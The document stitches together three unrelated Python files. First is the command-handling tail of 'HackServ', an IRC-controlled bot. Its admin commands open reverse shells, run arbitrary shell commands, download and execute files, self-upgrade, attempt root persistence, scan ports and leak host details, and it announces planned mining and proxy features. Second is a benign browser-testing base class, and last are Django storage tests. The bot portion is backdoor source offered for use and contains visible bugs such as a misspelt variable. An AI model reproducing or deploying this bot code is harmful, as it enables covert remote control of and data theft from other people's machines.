if name.lower() == adminname.lower() and message[:5].find('.msg') != -1:
target = message.split(' ', 1)[1]
if target.find(' ') != -1:
message = target.split(' ', 1)[1]
target = target.split(' ')[0]
else:
target = name
message = "Could not parse. The message should be in format of '.msg [target] [message]' to work properly."
sendmsg(message, target)
# Respond to '.ntc [target] [message]' command from admin.
if name.lower() == adminname.lower() and message[:5].find('.ntc') != -1:
target = message.split(' ', 1)[1]
if target.find(' ') != -1:
message = target.split(' ', 1)[1]
target = target.split(' ')[0]
else:
target = name
message = "Could not parse. The message should be in the format of '.notice [target] [message]' to work properly."
sendntc(message, target)
# Respond to '.kick [channel] [nick] [reason]' command from admin.
if name.lower() == adminname.lower() and message[:5].find('.kick') != -1:
target = message.split(' ', 1)[1]
if target.find(' ') != -1:
reason = target.split(' ', 2)[2]
nick = target.split(' ')[1]
chnl = target.split(' ')[0]
message = nick + " was kicked from " + chnl + " Reason:" + reason
kick(reason, nick, chnl)
else:
message = "Could not parse. The message should be in the format of '.kick [#channel] [nick] [reason]' to work properly."
sendntc(message, name)
# Respond to the '.mode [target] [mode]' command from admin.
if name.lower() == adminname.lower() and message[:5].find('.mode') != -1:
target = message.split(' ', 1)[1]
if target.find(' ') != -1:
mode = target.split(' ', 1)[1]
target = target.split(' ')[0]
message = "Setting mode " + mode + " on " + target + "!"
setmode(mode, target)
else:
message = "Could not parse. The message should be in the format of '.mode [target] [mode]' to work properly."
sendntc(message, adminname)
# Respond to the '.dl [url] [file]' command from admin.
if name.lower() == adminname.lower() and message[:5].find('.dl') != -1:
target = message.split(' ', 1)[1]
if target.find(' ') != -1:
download_file = target.split(' ', 1)[1]
download_url = target.split(' ')[0]
message = "The file " + download_file + " is downloading from " + download_url + "..."
download_thread = threading.Thread(target=download, args=(download_url, download_file))
download_thread.start()
else:
message = "Could not parse. The message should be in the format of '.dl [url] [file]' to work properly."
sendntc(message, adminname)
# Respond to the '.run [execute type] [executable file]' command from admin.
if name.lower() == adminname.lower() and message[:5].find('.run') != -1:
target = message.split(' ', 1)[1]
if target.find(' ') != -1:
exec_file = message.split(' ', 1)[1]
exec_type = message.split(' ')[0]
message = "Running the executable file: " + exec_file + " Using: " + exec_type
execute_thread = threading.Thread(target=execute, args=(exec_type, exec_file))
execute_thread.start()
else:
message = "Could not parse. The message should be in the format of '.run [exec type] [exec file]' to work properly."
sendntc(message, adminname)
# Respond to the '.raw [command]' command from admin.
if name.lower() == adminname.lower() and message[:5].find('.raw') != -1:
if message.split(' ', 1)[1] != -1:
rawc = message.split(' ', 1)[1]
message = "Sending '" + rawc + "' to the server!"
ircsend(rawc)
else:
message = "Could not parse. The message should be in the format of '.raw [command]' to work properly."
sendntc(message, adminname)
# Respond to the '.nick [newnick]' command from admin.
if name.lower() == adminname.lower() and message[:5].find('.nick') != -1:
if message.split(' ', 1)[1] != -1:
botnick = message.split(' ', 1)[1]
message = "Ok, Changing my nick to: " + botnick
newnick(botnick)
else:
message = "Could not parse. Please make sure the command is in the format of '.nick [newnick]' to work properly."
sendntc(message, name)
# Respond to the '.join [channel]' command from admin.
if name.lower() == adminname.lower() and message[:5].find('.join') != -1:
if message.split(' ', 1)[1].startswith('#'):
target = message.split(' ', 1)[1]
message = "Ok, I will join the channel: " + target
joinchan(target)
else:
message = "Could not parse. Please make sure the channel is in the format of '#channel'."
sendntc(message, name)
# Respond to the '.part [channel]' command from admin.
if name.lower() == adminname.lower() and message[:5].find('.part') != -1:
if message.split(' ', 1)[1].startswith('#'):
target = message.split(' ', 1)[1]
message = "Ok, I will part the channel: " + target
partchan(target)
else:
message = "Could not parse. Please make sure the channel is in the format of '#channel'."
sendntc(message, name)
# Respond to the '.pj [channel]' command from admin.
if name.lower() == adminname.lower() and message[:5].find('.pj') != -1:
if message.split(' ', 1)[1].startswith('#'):
target = message.split(' ', 1)[1]
message = "Ok, cycling " + target + " now!"
pjchan(target)
else:
message = "Could not parse. Please make sure the channel is in the format of '#channel'."
sendntc(message, name)
# Respond to the '.help' command.
if message.find('.help') != -1:
message = "End of Help."
if name.lower() == adminname.lower():
helpmsg = """
'.help' (shows this message),
'.username' (shows username of machine the bot is running on),
'.uptime' (shows bot uptime),
'.uname' (get 1-line system info),
'.sysinfo' (get formated system info),
'.osversion' (get OS version info),
'.memory' (get memory stats info),
'.ip' (get public ip address of bot),
'.macaddress' (get mac address info),
'.rsh [target] [port]' (opens reverse shell to target),
....listener can be downloaded at https://github.com/trackmastersteve/shell.git,
'.cmd [shell command]' (run shell commands on the host),
'.cno [shell command]' (run shell commands without output),
'.chmd [file] [permissions]' (change permissions of a file),
'.fsdl' (run fileserver to download files from),
'.scan [ip] [comma seperated ports]' (nmap port scanner),
'.msg [target] [message]' (sends a msg to a user/channel),
'.ntc [target] [message]' (sends a notice to a user/channel),
'.join [channel]' (tells bot to join channel),
'.part [channel]' (tells bot to part channel),
'.pj [channel]' (tells bot to part then rejoin channel),
'.kick [channel] [nick] [reason]' (tells bot to kick a user from a channel),
'.mode [target] [mode]' (set mode on nick or channel),
'.nick [newnick]' (sets a new botnick),
'.raw [command]' (sends a raw command to the IRC server),
'.ls [dir]' (lists files in a directory),
'.dl [url] [file]' (downloads [url] and saves as [file]),
'.run [execute type]' [executable file]' (execute a file),
'.upgrade [link] [file]' (upgrades the hackserv.py file),
'.mining [start/stop]' (coming soon!),
'.proxy [start/stop]' (coming soon!),
'.persistence' (attempt to enable persistence) (requires root permissions),
'Hi [botnick]' (responds to any user saying hello to it),
'bye [botnick]' (tells bot to quit)
"""
else:
helpmsg = """
'.help' (shows this message),
'Hi [botnick]' (responds to any user saying hello to it)
"""
helpmsg = [m.strip() for m in str(helpmsg).split(',')]
for line in helpmsg:
sendntc(line, name)
time.sleep(1)
sendntc(message, name)
# Respond to '.ip' command from admin.
if name.lower() == adminname.lower() and message.find('.ip') != -1:
ip = get('https://api.ipify.org').text
sendntc("My public ip address is: " + format(ip), name)
# Respond to '.uptime' command from admin.
if name.lower() == adminname.lower() and message.find('.uptime') != -1:
sendntc("My current uptime: " + format(uptime()), name)
# Respond to '.uname' command from admin.
if name.lower() == adminname.lower() and message.find('.uname') != -1:
sendntc("System Info: " + format(uname()), adminname)
# Respond to '.username' command from admin.
if name.lower() == adminname.lower() and message.find('.username') != -1:
sendntc("Username: " + format(username()), adminname)
sendntc("UID: " + format(guid()), adminname)
# Respond to '.macaddress' command from admin.
if name.lower() == adminname.lower() and message.find('.macaddress') != -1:
sendntc("Mac Address: " + format(macaddress()), adminname)
# Respond to '.sysinfo' command from admin.
if name.lower() == adminname.lower() and message.find('.sysinfo') != -1:
# System
time.sleep(1)
sendntc("System: " + format(platform.system()), adminname)
# Node
time.sleep(1)
sendntc("Node: " + format(platform.node()), adminname)
# Release
time.sleep(1)
sendntc("Release: " + format(platform.release()), adminname)
# Version
time.sleep(1)
sendntc("Version: " + format(platform.version()), adminname)
# Architecture
time.sleep(1)
sendntc("Architecture: " + format(platform.architecture()[0]), adminname)
# Machine
time.sleep(1)
sendntc("Machine: " + format(platform.machine()), adminname)
# Respond to '.osversion' command from admin.
if name.lower() == adminname.lower() and message.find('.osversion') != -1:
sendntc("OS Version: " + format(platform.version()), adminname)
# Respond to '.memory' command from admin.
if name.lower() == adminname.lower() and message.find('.memory') != -1:
if platform.system() == 'Linux':
message = "End of Memory Info."
linuxMemory()
else:
message = "Only Linux is currently supported."
sendntc(message, name)
# Respond to '.mining' command from admin.
if name.lower() == adminname.lower() and message.find('.mining') != -1:
target = message.split(' ', 1)[0]
nonExist(target, name)
# Respond to '.proxy' command from admin.
if name.lower() == adminname.lower() and message.find('.proxy') != -1:
target = message.split(' ', 1)[0]
nonExist(target, name)
# Respond to '.persistence' command from admin.
if name.lower() == adminname.lower() and message.find('.persistence') != -1:
if os.getuid() == 'root':
message = "Attempting to create persistence."
persistence()
else:
message = "HackServ does not have 'root' permissions."
sendntc(message, name)
# Respond to '.upgrade [link] [file]' command from admin.
if name.lower() == adminname.lower() and message.find('.upgrade') != -1:
target = message.split(' ', 1)[1]
if target.find(' ') != -1:
message = "Update sucessful!"
uFile = target.split(' ', 1)[1]
target = target.split(' ')[0]
update_thread = threading.Thread(target=update, args=(target, uFile))
update_thread.start()
else:
message = "Could not parse. The command should be in the format of '.update [link] [file]' to work properly."
sendntc(message, adminname)
# Respond to '.dl [file] [link]' command from admin.
if name.lower() == adminname.lower() and message[:5].find('.dl') != -1:
target = message.split(' ', 1)[1]
if target.find(' ') != -1:
message = "File downloaded!"
dlLink = target.split(' ', 1)[1]
dlFile = taregt.split(' ')[0]
download(dlFile, dlLink)
else:
message = "Could not parse. The command should be in the format of '.dl [file] [link]' to work properly."
# Respond to '.chmd [file] [permissions]' command from admin.
if name.lower() == adminname.lower() and message[:5].find('.chmd') != -1:
target = message.split(' ', 1)[1]
if target.find(' ') != -1:
message = "File permissions changed!"
cmMod = target.split(' ', 1)[1]
cmFile = target.split(' ')[0]
chFileMod(cmFile, cmMod)
else:
message = "Could not parse. The command should be in the format of '.chmd [file] [permissions]' to work properly."
sendntc(message, adminname)
# Respond to '.scan [target] [port(s)]' command from admin.
if name.lower() == adminname.lower() and message[:5].find('.scan') != -1:
target = message.split(' ', 1)[1]
if target.find(' ') != -1:
message = "nmap scan has completed!"
ports = target.split(' ', 1)[1]
target = target.split(' ')[0]
ports = [s.strip() for s in str(ports).split(',')]
for port in ports: # loops through comma seperated list of ports.
nmapScan_thread = threading.Thread(target=nmapScan, args=(target, port))
nmapScan_thread.start()
else:
message = "Could not parse. The command should be in the format of '.scan [targetIP] [comma,seperated,ports]' to work properly."
sendntc(message, adminname)
# Respond to '.rsh [target] [port]' command from admin.
if name.lower() == adminname.lower() and message[:5].find('.rsh') != -1:
if enableshell: # If enableshell is True, you can use this command.
target = message.split(' ', 1)[1]
if target.find(' ') != -1:
port = target.split(' ', 1)[1]
target = target.split(' ')[0]
message = "[+] Reverse shell connection established with " + target + ":" + port + "!"
rshell_thread = threading.Thread(target=rShell, args=(target,port))
rshell_thread.start()
else:
message = "Could not parse. The command should be in the format of '.rshell [target] [port]' to work properly."
sendntc(message, adminname)
else:
sendntc("Shell commands are disabled!", adminname)
# Respond to '.fsdl [target] [port]' command from admin.
if name.lower() == adminname.lower() and message[:5].find('.fsdl') != -1:
fileServer()
# Respond to '.ls' command from admin.
if name.lower() == adminname.lower() and message[:5].find('.ls') != -1:
target = message.split(' ', 1)[1]
fileList(target)
# Respond to '.cmd [shell command]' command from admin.
if name.lower() == adminname.lower() and message[:5].find('.cmd') != -1:
if enableshell: # If enableshell is True, you can use this command.
if message.split(' ', 1)[1] != -1:
shellcmd = message.split(' ', 1)[1]
message = "Shell> " + shellcmd
runcmd_thread = threading.Thread(target=runcmd, args=(shellcmd,))
runcmd_thread.start()
else:
message = "Could not parse. The command should be in the format of '.cmd [shell command]' to work properly."
sendntc(message, adminname)
else:
sendntc("Shell commands are disabled!", adminname)
# Respond to '.cno [shell command]' command from admin.
if name.lower() == adminname.lower() and message[:5].find('.cno') != -1:
if enableshell: # If enableshell is True, you can use this command.
if message.split(' ', 1)[1] != -1:
shellcmd = message.split(' ', 1)[1]
message = "Shell> " + shellcmd
runcmd_noout_thread = threading.Thread(target=runcmd_noout, args=(shellcmd,))
runcmd_noout_thread.start()
else:
message = "Could not parse. The command should be in the format of '.cno [shell command]' to work properly."
sendntc(message, adminname)
else:
sendntc("Shell commands are disabled!", adminname)
# Respond to 'exitcode botnick' from admin.
if name.lower() == adminname.lower() and message.rstrip() == exitcode + " " + botnick:
sendmsg("Okay, Bye!")
ircsend("QUIT Killed by " + adminname)
sys.exit()
else:
if ircmsg.find("PING") != -1: # Reply to PINGs.
nospoof = ircmsg.split(' ', 1)[1] # Unrealircd 'nospoof' compatibility.
ircsend("PONG " + nospoof)
if debugmode: # If debugmode is True, msgs will print to screen.
print("Replying with '"+ nospoof +"'")
lastping = time.time() # Set time of last PING.
if (time.time() - lastping) >= threshold: # If last PING was longer than set threshold, try and reconnect.
if debugmode: # If debugmode is True, msgs will print to screen.
print('PING time exceeded threshold')
connected = False
reconnect()
if not ircmsg: # If no response from server, try and reconnect.
if debugmode: # If debugmode is True, msgs will print to screen.
print('Disconnected from server')
connected = False
reconnect()
try: # Here is where we actually start the Bot.
if not connected:
if os.path.isfile('./hsConfig.py'): # Check if the config file exists.
if debugmode: # If debugmode is True, msgs will print to screen.
print("hsConfig.py found. Starting HackServ...")
#fileList() # Get list of files in current directory.
connect() # Connect to server.
else:
if debugmode: # If debugmode is True, msgs will print to screen.
print("hsConfig.py does not exist. Exiting...")
sys.exit()
except KeyboardInterrupt: # Kill Bot from CLI using CTRL+C
ircsend("QUIT Terminated Bot using [ctrl + c]")
if debugmode: # If debugmode is True, msgs will print to screen.
print('... Terminated Bot using [ctrl + c], Shutting down!')
sys.exit()
|
browser_base.py | #!/usr/bin/env python
from __future__ import print_function, absolute_import
# -*- coding: utf-8 -*-
__author__ = "perfguru87@gmail.com"
__copyright__ = "Copyright 2018, The PerfTracker project"
__license__ = "MIT"
"""
Base browser library
"""
import sys
import time
import tempfile
import re
import logging
import os
import threading
import traceback
import datetime
import platform
if sys.version_info[0] < 3:
import httplib
else:
import http.client as httplib
# time to wait for the incomplete requests
DEFAULT_NAV_TIMEOUT = 60.0
# time to wait for browser ajax activity (in seconds) to consider page load is fully complete
DEFAULT_AJAX_THRESHOLD = 2.0
"""
TODO:
- Network connection simulation (3G, LTE, etc) (Use tc on linux, pfctl on Mac ?)
- IE support (needed for Windows)
- handle 'Server not found'
"""
"""
Glossary
Browser classes:
BrowserBase class - base browser class representing API available to the library users
|- BrowserWebdriver - base class for webdriver (i.e. selenium) based browsers (Chrome, Firefox)
| |- BrowserChrome - Chrome browser
| `- FirefoxBrowser - Firefox browser
`- BrowserPython - Python browser
`- CPBase - Control Panel base class
Page classes:
PageStats - class collecting all the page request to given URL
Page - class describing a page request and response (i.e. navigation item in the prowser)
PageRequest - class describing individual sub-requests of a page (css, js, html, etc)
PageTimeline - represents page timeline
PageWithActions - represents some kind of the html page model with focus on actions (URLs)
"""
from .page import Page, PageStats, PageTimeline
################################################################
# Exceptions
################################################################
class BrowserExc(Exception):
def __init__(self, msg=""):
Exception.__init__(self, "%s" % msg)
self.message = "browser module exception: %s" % msg
class BrowserExcTimeout(BrowserExc):
def __init__(self, msg=""):
BrowserExc.__init__(self, "%s" % msg)
self.message = "browser module timeout: %s" % msg
class BrowserExcNotImplemented(BrowserExc):
pass
class BrowserExcNotSupported(BrowserExc):
"""
Raise this exception if for instance given method is intentionally not supported in a class
"""
def __init__(self):
BrowserExc.__init__(self)
tb = traceback.extract_tb() # FIXME
self.message += "method %s is not supported in %s" % (str(tb), "FIXME Class")
class BrowserExcError(BrowserExc):
def __init__(self, message):
BrowserExc.__init__(self)
self.message += message
################################################################
# Browser class
################################################################
_browser_id = {}
class BrowserBase:
engine = 'basebrwsr'
def __init__(self, headless=True, resolution=(1440, 900), cleanup=True, telemetry_fname=None,
log_path='auto', nav_timeout=DEFAULT_NAV_TIMEOUT, ajax_threshold=DEFAULT_AJAX_THRESHOLD,
remote_connstring=None):
self.history = []
self.page_stats = {}
self._name = self._init_name()
self.resolution = resolution
self.driver = None
self.display = None
self.pid = None
self.nav_timeout = nav_timeout
self.ajax_threshold = ajax_threshold
self.remote_connstring = remote_connstring
if log_path == 'auto':
self.log_path = tempfile.NamedTemporaryFile(delete=cleanup).name
else:
self.log_path = log_path
if telemetry_fname:
self.telemetry_log = open(telemetry_fname, 'a', 0)
else:
self.telemetry_log = None
if self.log_path:
self.log_info("log path: %s" % self.log_path)
self._browser_display_init(headless, resolution)
self.pid = self.browser_start()
if not self.pid:
raise BrowserExc("Browser initialization failed")
self._base_rss_kb = self._browser_get_rss_kb()
# looping
self._loop_locations = []
self._loop_stop = True
self._loop_thread = None
self._loop_sleep_sec = 0
def _init_name(self):
global _browser_id
id = _browser_id.get(self.engine, 0)
_name = "%s#%02d" % (self.engine, id)
_browser_id[self.engine] = id + 1
return _name
def __del__(self):
self.browser_stop()
# === browser* methods ===#
def _browser_clear_caches(self):
"""
clear browser caches
"""
self.history = []
def _browser_navigate(self, location, cached=True, name=None):
raise NotImplementedError
def _browser_wait(self, page, timeout=None):
"""
wait for navigation request completion
"""
raise NotImplementedError
def _browser_warmup_page(self, location, name=None):
"""
warmup (i.e. cache) a page
"""
raise NotImplementedError
def _browser_display_init(self, headless, resolution):
return
def _browser_get_current_url(self):
raise NotImplementedError
def browser_get_name(self):
raise NotImplementedError
def browser_get_version(self):
raise NotImplementedError
def browser_get_platform(self):
raise platform.platform()
def _browser_get_rss_kb(self):
return 0
def browser_get_ram_usage_kb(self):
return self._browser_get_rss_kb() - self._base_rss_kb
def browser_get_screenshot_as_file(self, filename):
raise NotImplementedError
def browser_get_page_timeline(self, page):
return PageTimeline(page)
def browser_start(self):
raise NotImplementedError
def browser_stop(self):
"""
exit from the driver
"""
raise NotImplementedError
def browser_reset(self):
"""Reset cookies and connection pools"""
pass
# === domain methods === #
def domain_get_cookies(self, url):
raise NotImplementedError
def domain_set_cookies(self, url, cookies):
raise NotImplementedError
def domain_set_cookie(self, url, key, val=None, path=None):
raise NotImplementedError
def domain_set_header(self, url, key, val):
raise NotImplementedError
def domain_set_session(self, url, session_id):
raise NotImplementedError
# ==== logging === #
def log_debug(self, msg):
logging.debug(msg, extra={'browser': self._name})
def log_info(self, msg):
logging.info(msg, extra={'browser': self._name})
def log_warning(self, msg):
logging.warning(msg, extra={'browser': self._name})
def log_error(self, msg):
logging.error(msg, extra={'browser': self._name})
def event_log(self, p):
if not self.telemetry_log:
return
self.telemetry_log.write(p.serialize())
# === Navigation looping === #
def _loop(self):
try:
while not self._loop_stop:
for loc in self._loop_locations:
self.navigate_to(loc)
time.sleep(self._loop_sleep_sec)
except httplib.BadStatusLine as e:
pass
except RuntimeError:
logging.error("traceback:\n" + traceback.format_exc())
def loop_start(self, locations, sleep_sec=0):
self.log_debug("loop_start():\n %s" % "\n ".join([str(loc) for loc in locations]))
if self._loop_thread:
self.loop_stop()
self._loop_locations = locations
self._loop_sleep_sec = sleep_sec
self._loop_stop = False
self._loop_thread = threading.Thread(target=self._loop)
self._loop_thread.start()
def loop_stop(self):
self.log_debug("loop_stop()")
self._loop_stop = True
def loop_wait(self):
self.log_debug("loop_wait()")
self._loop_thread.join()
self._loop_thread = None
# === navigation API === #
def navigate_to(self, location, timeout=None, cached=True, stats=True, name=None):
"""
navigate to given url or page in cached/uncached mode
"""
url = location.url if isinstance(location, Page) else location
scheme = url.split(":")[0]
if scheme not in ("http", "https", "file", "about", "chrome"):
url = "http://%s" % url
if isinstance(location, Page):
location.url = url
else:
location = url
if cached is None:
self.log_info("Navigate to: %s" % url)
else:
self.log_info("Navigate to: %s %s" % (url, "CACHED" if cached else "UNCACHED"))
if cached and url not in self.history:
self._browser_warmup_page(location, name=name)
elif not cached and url in self.history:
self._browser_clear_caches()
p = self._browser_navigate(location, cached=cached, name=name)
self._browser_wait(p, timeout=timeout)
self.history.append(url)
if stats:
key = p.get_key()
if key not in self.page_stats:
self.page_stats[key] = PageStats(len(self.page_stats))
self.page_stats[key].add_iteration(p)
self.event_log(p)
self.log_info("Navigation completed: %s %s, dur %d ms" % (url, "CACHED" if cached else "UNCACHED", p.dur))
return p
def navigation_reset(self):
pass
# === printing facilities === #
@staticmethod
def print_stats_title(title):
print("")
print(title.upper())
print("=" * len(title))
print("")
def print_browser_info(self):
raise NotImplementedError
##############################################################################
# Autotests
##############################################################################
if __name__ == "__main__":
try:
b = BrowserBase()
except NotImplementedError:
print("OK")
sys.exit(0)
sys.exit(-1)
|
tests.py | import errno
import os
import shutil
import sys
import tempfile
import threading
import time
import unittest
from datetime import datetime, timedelta
from io import StringIO
from urllib.request import urlopen
from django.core.cache import cache
from django.core.exceptions import SuspiciousFileOperation, SuspiciousOperation
from django.core.files.base import ContentFile, File
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.core.files.uploadedfile import (
InMemoryUploadedFile, SimpleUploadedFile, TemporaryUploadedFile,
)
from django.db.models.fields.files import FileDescriptor
from django.test import (
LiveServerTestCase, SimpleTestCase, TestCase, override_settings,
)
from django.test.utils import requires_tz_support
from django.urls import NoReverseMatch, reverse_lazy
from django.utils import timezone
from .models import Storage, temp_storage, temp_storage_location
FILE_SUFFIX_REGEX = '[A-Za-z0-9]{7}'
class GetStorageClassTests(SimpleTestCase):
def test_get_filesystem_storage(self):
"""
get_storage_class returns the class for a storage backend name/path.
"""
self.assertEqual(
get_storage_class('django.core.files.storage.FileSystemStorage'),
FileSystemStorage)
def test_get_invalid_storage_module(self):
"""
get_storage_class raises an error if the requested import don't exist.
"""
with self.assertRaisesMessage(ImportError, "No module named 'storage'"):
get_storage_class('storage.NonExistingStorage')
def test_get_nonexisting_storage_class(self):
"""
get_storage_class raises an error if the requested class don't exist.
"""
with self.assertRaises(ImportError):
get_storage_class('django.core.files.storage.NonExistingStorage')
def test_get_nonexisting_storage_module(self):
"""
get_storage_class raises an error if the requested module don't exist.
"""
with self.assertRaisesMessage(ImportError, "No module named 'django.core.files.non_existing_storage'"):
get_storage_class('django.core.files.non_existing_storage.NonExistingStorage')
class FileSystemStorageTests(unittest.TestCase):
def test_deconstruction(self):
path, args, kwargs = temp_storage.deconstruct()
self.assertEqual(path, "django.core.files.storage.FileSystemStorage")
self.assertEqual(args, tuple())
self.assertEqual(kwargs, {'location': temp_storage_location})
kwargs_orig = {
'location': temp_storage_location,
'base_url': 'http://myfiles.example.com/'
}
storage = FileSystemStorage(**kwargs_orig)
path, args, kwargs = storage.deconstruct()
self.assertEqual(kwargs, kwargs_orig)
def test_lazy_base_url_init(self):
"""
FileSystemStorage.__init__() shouldn't evaluate base_url.
"""
storage = FileSystemStorage(base_url=reverse_lazy('app:url'))
with self.assertRaises(NoReverseMatch):
storage.url(storage.base_url)
class FileStorageTests(SimpleTestCase):
storage_class = FileSystemStorage
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = self.storage_class(location=self.temp_dir, base_url='/test_media_url/')
# Set up a second temporary directory which is ensured to have a mixed
# case name.
self.temp_dir2 = tempfile.mkdtemp(suffix='aBc')
def tearDown(self):
shutil.rmtree(self.temp_dir)
shutil.rmtree(self.temp_dir2)
def test_empty_location(self):
"""
Makes sure an exception is raised if the location is empty
"""
storage = self.storage_class(location='')
self.assertEqual(storage.base_location, '')
self.assertEqual(storage.location, os.getcwd())
def test_file_access_options(self):
"""
Standard file access options are available, and work as expected.
"""
self.assertFalse(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'w')
f.write('storage contents')
f.close()
self.assertTrue(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'r')
self.assertEqual(f.read(), 'storage contents')
f.close()
self.storage.delete('storage_test')
self.assertFalse(self.storage.exists('storage_test'))
def _test_file_time_getter(self, getter):
# Check for correct behavior under both USE_TZ=True and USE_TZ=False.
# The tests are similar since they both set up a situation where the
# system time zone, Django's TIME_ZONE, and UTC are distinct.
self._test_file_time_getter_tz_handling_on(getter)
self._test_file_time_getter_tz_handling_off(getter)
@override_settings(USE_TZ=True, TIME_ZONE='Africa/Algiers')
def _test_file_time_getter_tz_handling_on(self, getter):
# Django's TZ (and hence the system TZ) is set to Africa/Algiers which
# is UTC+1 and has no DST change. We can set the Django TZ to something
# else so that UTC, Django's TIME_ZONE, and the system timezone are all
# different.
now_in_algiers = timezone.make_aware(datetime.now())
with timezone.override(timezone.get_fixed_timezone(-300)):
# At this point the system TZ is +1 and the Django TZ
# is -5. The following will be aware in UTC.
now = timezone.now()
self.assertFalse(self.storage.exists('test.file.tz.on'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file.tz.on', f)
self.addCleanup(self.storage.delete, f_name)
dt = getter(f_name)
# dt should be aware, in UTC
self.assertTrue(timezone.is_aware(dt))
self.assertEqual(now.tzname(), dt.tzname())
# The three timezones are indeed distinct.
naive_now = datetime.now()
algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
django_offset = timezone.get_current_timezone().utcoffset(naive_now)
utc_offset = timezone.utc.utcoffset(naive_now)
self.assertGreater(algiers_offset, utc_offset)
self.assertLess(django_offset, utc_offset)
# dt and now should be the same effective time.
self.assertLess(abs(dt - now), timedelta(seconds=2))
@override_settings(USE_TZ=False, TIME_ZONE='Africa/Algiers')
def _test_file_time_getter_tz_handling_off(self, getter):
# Django's TZ (and hence the system TZ) is set to Africa/Algiers which
# is UTC+1 and has no DST change. We can set the Django TZ to something
# else so that UTC, Django's TIME_ZONE, and the system timezone are all
# different.
now_in_algiers = timezone.make_aware(datetime.now())
with timezone.override(timezone.get_fixed_timezone(-300)):
# At this point the system TZ is +1 and the Django TZ
# is -5.
self.assertFalse(self.storage.exists('test.file.tz.off'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file.tz.off', f)
self.addCleanup(self.storage.delete, f_name)
dt = getter(f_name)
# dt should be naive, in system (+1) TZ
self.assertTrue(timezone.is_naive(dt))
# The three timezones are indeed distinct.
naive_now = datetime.now()
algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
django_offset = timezone.get_current_timezone().utcoffset(naive_now)
utc_offset = timezone.utc.utcoffset(naive_now)
self.assertGreater(algiers_offset, utc_offset)
self.assertLess(django_offset, utc_offset)
# dt and naive_now should be the same effective time.
self.assertLess(abs(dt - naive_now), timedelta(seconds=2))
# If we convert dt to an aware object using the Algiers
# timezone then it should be the same effective time to
# now_in_algiers.
_dt = timezone.make_aware(dt, now_in_algiers.tzinfo)
self.assertLess(abs(_dt - now_in_algiers), timedelta(seconds=2))
def test_file_get_accessed_time(self):
"""
File storage returns a Datetime object for the last accessed time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
atime = self.storage.get_accessed_time(f_name)
self.assertEqual(atime, datetime.fromtimestamp(os.path.getatime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_accessed_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_accessed_time_timezone(self):
self._test_file_time_getter(self.storage.get_accessed_time)
def test_file_get_created_time(self):
"""
File storage returns a datetime for the creation time of a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
ctime = self.storage.get_created_time(f_name)
self.assertEqual(ctime, datetime.fromtimestamp(os.path.getctime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_created_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_created_time_timezone(self):
self._test_file_time_getter(self.storage.get_created_time)
def test_file_get_modified_time(self):
"""
File storage returns a datetime for the last modified time of a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
mtime = self.storage.get_modified_time(f_name)
self.assertEqual(mtime, datetime.fromtimestamp(os.path.getmtime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_modified_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_modified_time_timezone(self):
self._test_file_time_getter(self.storage.get_modified_time)
def test_file_save_without_name(self):
"""
File storage extracts the filename from the content object if no
name is given explicitly.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f.name = 'test.file'
storage_f_name = self.storage.save(None, f)
self.assertEqual(storage_f_name, f.name)
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, f.name)))
self.storage.delete(storage_f_name)
def test_file_save_with_path(self):
"""
Saving a pathname should create intermediate directories as necessary.
"""
self.assertFalse(self.storage.exists('path/to'))
self.storage.save('path/to/test.file', ContentFile('file saved with path'))
self.assertTrue(self.storage.exists('path/to'))
with self.storage.open('path/to/test.file') as f:
self.assertEqual(f.read(), b'file saved with path')
self.assertTrue(os.path.exists(
os.path.join(self.temp_dir, 'path', 'to', 'test.file')))
self.storage.delete('path/to/test.file')
def test_save_doesnt_close(self):
with TemporaryUploadedFile('test', 'text/plain', 1, 'utf8') as file:
file.write(b'1')
file.seek(0)
self.assertFalse(file.closed)
self.storage.save('path/to/test.file', file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
file = InMemoryUploadedFile(StringIO('1'), '', 'test', 'text/plain', 1, 'utf8')
with file:
self.assertFalse(file.closed)
self.storage.save('path/to/test.file', file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
def test_file_path(self):
"""
File storage returns the full path of a file
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.assertEqual(self.storage.path(f_name), os.path.join(self.temp_dir, f_name))
self.storage.delete(f_name)
def test_file_url(self):
"""
File storage returns a url to access a given file from the Web.
"""
self.assertEqual(self.storage.url('test.file'), self.storage.base_url + 'test.file')
# should encode special chars except ~!*()'
# like encodeURIComponent() JavaScript function do
self.assertEqual(
self.storage.url(r"~!*()'@#$%^&*abc`+ =.file"),
"/test_media_url/~!*()'%40%23%24%25%5E%26*abc%60%2B%20%3D.file"
)
self.assertEqual(self.storage.url("ab\0c"), "/test_media_url/ab%00c")
# should translate os path separator(s) to the url path separator
self.assertEqual(self.storage.url("""a/b\\c.file"""), "/test_media_url/a/b/c.file")
# #25905: remove leading slashes from file names to prevent unsafe url output
self.assertEqual(self.storage.url("/evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(r"\evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url("///evil.com"), "/test_media_url/evil.com")
